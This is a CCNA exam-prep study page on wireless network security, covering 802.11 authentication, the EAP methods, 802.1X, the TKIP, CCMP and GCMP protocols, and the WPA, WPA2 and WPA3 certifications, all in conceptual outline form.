CCNA Notes

200-301 Exam Prep

Progress0/67

0% complete

Practice TestsNew
1Networking Devices2Interfaces And Cables3OSI Model and TCP/IP Suite4Intro to the CLI5Ethernet LAN Switching - Part 16Ethernet LAN Switching - Part 27IPv4 Addressing - Part 18IPv4 Addressing - Part 29Switch Interfaces10The IPv4 Header11Routing Fundamentals - Part 111Static Routing - Part 212Life of a Packet13Subnetting - Part 114Subnetting - Part 215Subnetting (VLSM) - Part 316VLANs - Part 117VLANs - Part 218VLANs - Part 319DTP / VTP20Spanning Tree Protocol - Part 121Spanning Tree Protocol - Part 222Rapid Spanning Tree Protocol23Etherchannel24Dynamic Routing25RIP / EIGRP26OSPF - Part 127OSPF - Part 228OSPF - Part 329First Hop Redundancy Protocol30TCP and UDP31IPv6 - Part 132IPv6 - Part 233IPv6 - Part 334Standard Access Control List35Extended Access Control List36CDP and LLDP37NTP - Network Time Protocol38DNS - Domain Name System39DHCP - Dynamic Host Configuration Protocol40SNMP - Simple Network Management Protocol41SYSLOG42SSH - Secure Shell43FTP and TFTP44NAT (Static) - Part 145NAT (Dynamic) - Part 246QoS (Voice VLAN) - Part 147QoS (Quality of Service) - Part 248Security Fundamentals49Port Security50DHCP Snooping51Dynamic ARP Inspection52LAN Architectures53WAN Architectures54Virtualization and Cloud - Part 154Virtualization (Containers) - Part 254Virtualization (VRF) - Part 355Wireless Fundamentals56Wireless Architectures57Wireless Security58Wireless Configuration59Introduction to Network Automation60JSON, XML, and YAML61REST APIs62Software Defined Networking63Ansible, Puppet, and Chef67CCNA Complete Cheatsheet
/Wireless Security
Topic 579 min read

Wireless Security

/
Tip: Select text to highlight or pin your reading position

57. WIRELESS SECURITY

INTRO TO WIRELESS NETWORK SECURITY

  • Although SECURITY is important in ALL NETWORKS, it is even more essential in WIRELESS NETWORKS

  • Because WIRELESS SIGNALS are not contained within a WIRE, any DEVICE within range of the signal can receive traffic

  • In WIRED NETWORKS, traffic is often only ENCRYPTED when sent over an UNTRUSTED NETWORK such as the INTERNET

  • In WIRELESS NETWORKS, it is VERY important to ENCRYPT traffic sent between the WIRELESS CLIENTS and the AP

  • We will cover THREE MAIN CONCEPTS:

    • AUTHENTICATION
    • ENCRYPTION
    • INTEGRITY

AUTHENTICATION

  • All CLIENTS must be AUTHENTICATED before they can associate with an AP
  • In a corporate setting, only TRUSTED USERS / DEVICES should be given ACCESS to the NETWORK
    • In corporate settings, a separate SSID which doesn’t have ACCESS to the corporate NETWORK can be provided for GUEST USERS
  • Ideally, CLIENTS should also AUTHENTICATE the AP to avoid associating with a malicious AP
  • There are MULTIPLE WAYS to AUTHENTICATE:
    • PASSWORD
    • USERNAME / PASSWORD
    • CERTIFICATES

imageClick to enlarge

ENCRYPTION

  • Traffic sent between CLIENTS and APs should be ENCRYPTED so that it can’t be read by anyone except the AP and the CLIENT
  • There are many possible PROTOCOLS that can be used to ENCRYPT traffic
  • All DEVICES on the WLAN will use the same PROTOCOL, however each CLIENT will use a unique ENCRYPTION / DECRYPTION KEY so that other DEVICES can’t read its traffic
  • A “GROUP KEY” is used by the AP to ENCRYPT traffic that it wants to send to all of its clients
    • All of the CLIENTS associated with the AP keep that key so they can DECRYPT the traffic

INTEGRITY

  • As explained in the “SECURITY FUNDAMENTALS” video of the course, INTEGRITY ensures that the message is not modified by a third-party
  • The message that is sent by the SOURCE HOST should be the same as the message that is received by the DESTINATION HOST
  • A MIC (Message Integrity Check) is added to the message to help protect their INTEGRITY.

imageClick to enlarge

AUTHENTICATION METHODS

The original 802.11 STANDARD included TWO OPTIONS for AUTHENTICATION:

  • OPEN AUTHENTICATION
    • The CLIENT sends an AUTHENTICATION REQUEST and the AP just accepts it
    • The is clearly NOT a SECURE AUTHENTICATION method
    • After the CLIENT is AUTHENTICATED and associated with the AP, it’s possible to require the USER to AUTHENTICATE via other methods before ACCESS to the NETWORK is granted (ie: Starbucks WI-FI)
  • WEP (Wired Equivalent Privacy)
    • WEP is used to provide both AUTHENTICATION and ENCRYPTION of WIRELESS traffic
    • For ENCRYPTION, WEP uses the RC4 ALGORITHM
    • WEP is a “SHARED-KEY” PROTOCOL, requiring the SENDER and RECEIVER to have the same KEY
    • WEP KEYS can be 40 bits or 104 bits in length
    • The above KEYS are combined with a 24-bit “IV” (INITIALIZATION VECTOR) to bring the total length to 64 bits or 128 bits
    • WEP ENCRYPTION is NOT SECURE and can easily be cracked
    • WEP can be used for AUTHENTICATION like this:

imageClick to enlarge

EAP (Extensible Authentication Protocol)

  • EAP is an AUTHENTICATION FRAMEWORK
  • It defines a STANDARD SET of AUTHENTICATION FUNCTIONS that are used by the various EAP METHODS
  • We will look at FOUR EAP METHODS:
    • LEAP
    • EAP-FAST
    • PEAP
    • EAP-TLS
  • EAP is integrated with 802.1X which provides PORT-BASED NETWORK ACCESS CONTROL

802.1X is used to limit NETWORK ACCESS for CLIENTS connected to a LAN or WLAN until they AUTHENTICATE

There are THREE MAIN ENTITIES in 802.1X:

  • SUPPLICANT : The DEVICE that wants to connect to the NETWORK
  • AUTHENTICATOR : The DEVICE that provides access to the NETWORK
  • AUTHENTICATION SERVER (AS) : The DEVICE that receives CLIENT credentials and PERMITS / DENIES ACCESS

imageClick to enlarge

  • LEAP (Lightweight EAP)
    • LEAP was developed by Cisco an an improvement over WEP
    • CLIENTS must provide a USERNAME and PASSWORD to AUTHENTICATE
    • In addition, MUTUAL AUTHENTICATION is provided by both the CLIENT and SERVER sending a CHALLENGE PHRASE to each other.
    • DYNAMIC WEP KEYS are used, meaning that the WEP KEYS are changed frequently
    • Like WEP, LEAP is considered vulnerable and should not be used anymore

imageClick to enlarge

  • EAP-FAST (EAP FLEXIBLE AUTHENTICATION via SECURE TUNNELING)
    • EAP-FAST was also developed by Cisco
    • Consists of THREE PHASES:
      • A PAC (PROTECTED ACCESS CREDENTIAL) is generated and passed from SERVER to CLIENT
      • A SECURE TLS TUNNEL is established between the CLIENT and AUTHENTICATION SERVER
      • Inside of the SECURE (ENCRYPTED) TLS TUNNEL, the CLIENT and SERVER communicated further to AUTHENTICATE / AUTHORIZE the CLIENT

imageClick to enlarge

  • PEAP (PROTECTED EAP)
    • Like EAP-FAST, PEAP involves establishing a SECURE TLS TUNNEL between the CLIENT and SERVER
    • Instead of a PAC, the SERVER has a DIGITAL CERTIFICATE
    • The CLIENT uses this DIGITAL CERTIFICATE to AUTHENTICATE the SERVER
    • The CERTIFICATE is also used to establish a TLS TUNNEL
    • Because only the SERVER provides a CERTIFICATE for AUTHENTICATION, the CLIENT must still be AUTHENTICATED within the SECURE TUNNEL
      • Example: MS-CHAP (Microsoft Challenge-Handshake Authentication Protocol)

imageClick to enlarge

  • EAP-TLS (EAP TRANSPORT LAYER SECURITY)
    • Whereas PEAP only requires the AS to have a CERTIFICATE, EAP-TLS requires a CERTIFICATE on the AS and on every single CLIENT
    • EAP-TLS is the MOST SECURE WIRELESS AUTHENTICATION method, but it is more difficult to implement than PEAP because every CLIENT DEVICE needs a CERTIFICATE
    • Because the CLIENT and SERVER AUTHENTICATE each other with DIGITAL CERTIFICATES, there is no need to AUTHENTICATE the CLIENT within the TLS TUNNEL
    • The TLS TUNNEL is still used to exchange ENCRYPTION KEY information (ENCRYPTION methods will be discussed next)

imageClick to enlarge

ENCRYPTION / INTEGRITY METHODS

  • TKIP (Temporal Key Integrity Protocol)
    • WEP was found to be vulnerable, but WIRELESS hardware at the time was built to use WEP
    • A temporary solution was needed until a new STANDARD was created and a new HARDWARE was built
    • TKIP adds various SECURITY FEATURES:
      • A MIC (Message Integrity Check) is added to protect the integrity of messages
      • A KEY MIXING ALGORITHM is used to create a unique WEP key for every frame
      • The INITIALIZATION VECTOR is doubled in length from 24 bits to 48 bits, making BRUTE-FORCE attacks much more difficult
      • The MIC includes the SENDER MAC ADDRESS to identify the FRAME’s SENDER
      • A TIMESTAMP is added to the MIC to prevent replay attacks. Replay attacks involved re-resending a FRAME that has already been transmitted
      • A TKIP SEQUENCE NUMBER is used to keep track of FRAMES sent from each SOURCE MAC ADDRESS. This also protects against REPLAY ATTACKS

** You probably don’t need to memorize ALL of the above features

** TKIP is used in WPA version 1, which will be discussed in the next section

  • CCMP (Counter / CBC-MAC Protocol)

    • CCMP was developed after TKIP and is more SECURE
    • It is used in WPA2
    • To use CCMP, it must be supported by the DEVICE’S hardware.
    • Old hardware built only to use WEP / TKIP cannot use CCMP
    • CCMP consists of TWO DIFFERENT ALGORITHMS to provide ENCRYPTION and MIC :
      • AES (Advanced Encryption Standard) COUNTER MODE ENCRYPTION
        • AES is the MOST SECURE ENCRYPTION PROTOCOL currently available.
        • Widely used all over the world
        • There are multiple MODES of operation for AES.
        • CCMP uses “COUNTER MODE”
      • CBC-MAC (CIPHER BLOCK CHAINING MESSAGE AUTHENTICATION CODE)
        • Used as a MIC to ENSURE the INTEGRITY of MESSAGES

  • GCMP (GALOIS / COUNTER MODE PROTOCOL)

    • GCMP is MORE SECURE and EFFICIENT than CCMP
    • Its increased efficiency allows higher data throughput than CCMP
    • It is used in WPA3
    • GCMP consists of TWO ALGORITHMS:
      • AES COUNTER MODE ENCRYPTION
      • GMAC (GALOIS MESSAGE AUTHENTICATION CODE)
        • Used as a MIC to ENSURE the INTEGRITY of MESSAGE

WI-FI PROTECTED ACCESS (WPA)

  • The WI-FI Alliance has developed THREE WPA CERTIFICATIONS for WIRELESS DEVICES:

    • WPA
    • WPA2
    • WPA3

  • To be WPA-CERTIFIED, EQUIPMENT must be TESTED in authorized testing labs

  • All of the above support TWO AUTHENTICATION MODES:

    • PERSONAL MODE :
      • A PRE-SHARED KEY (PSK) is used for AUTHENTICATOIN
      • When you connect to a home WI-FI NETWORK, enter the PASSWORD and are AUTHENTICATED, that is PERSONAL MODE
      • This is common in small NETWORKS
      • The PSK itself is NOT sent over the air
      • A FOUR-WAY HANDSHAKE is used for AUTHENTICATION and the PSK is used to GENERATE ENCRYPTION KEYS
    • ENTERPRISE MODE :
      • 802.1X is used with an AUTHENTICATION SERVER (RADIUS SERVER)
      • No specific EAP METHOD is specified, so all are supported (PEAP, EAP-TLS, etc)

    WPA

    • The WPA CERTIFICATION was developed after WEP was proven to be vulnerable and includes the following PROTOCOLS:
      • TKIP (based on WEP) provides ENCRYPTION / MIC
      • 802.1X AUTHENTICATION (ENTERPRISE MODE) or PSK (PERSONAL MODE)

    WPA2

    • Was released in 2004 and includes the following PROTOCOLS:
      • CCMP provides ENCRYPTION / MIC
      • 802.1X AUTHENTICATION (ENTERPRISE MODE) or PSK (PERSONAL MODE)

    WPA3

    • Was released in 2018 and includes the following PROTOCOLS:

      • GCMP provides ENCRYPTION / MIC

      • 802.1X AUTHENTICATION (ENTERPRISE MODE) or PSK (PERSONAL MODE)

      • WPA3 also provides several additional security features:

        • PMF (PROTECTED MANAGEMENT FRAMES)
          • Protecting 802.11 MANAGEMENT FRAMES from eavesdropping / forging
        • SAE (SIMULTANEOUS AUTHENTICATION OF EQUALS)
          • Protects the four-way handshake when using PERSONAL MODE AUTHENTICATION
        • FORWARD SECRECY
          • Prevents DATA from being DECRYPTED after it has been transmitted over the air so an ATTACKER can’t capture WIRELESS FRAMES and then try to DECRYPT them later
PreviousWireless Architectures
NextWireless Configuration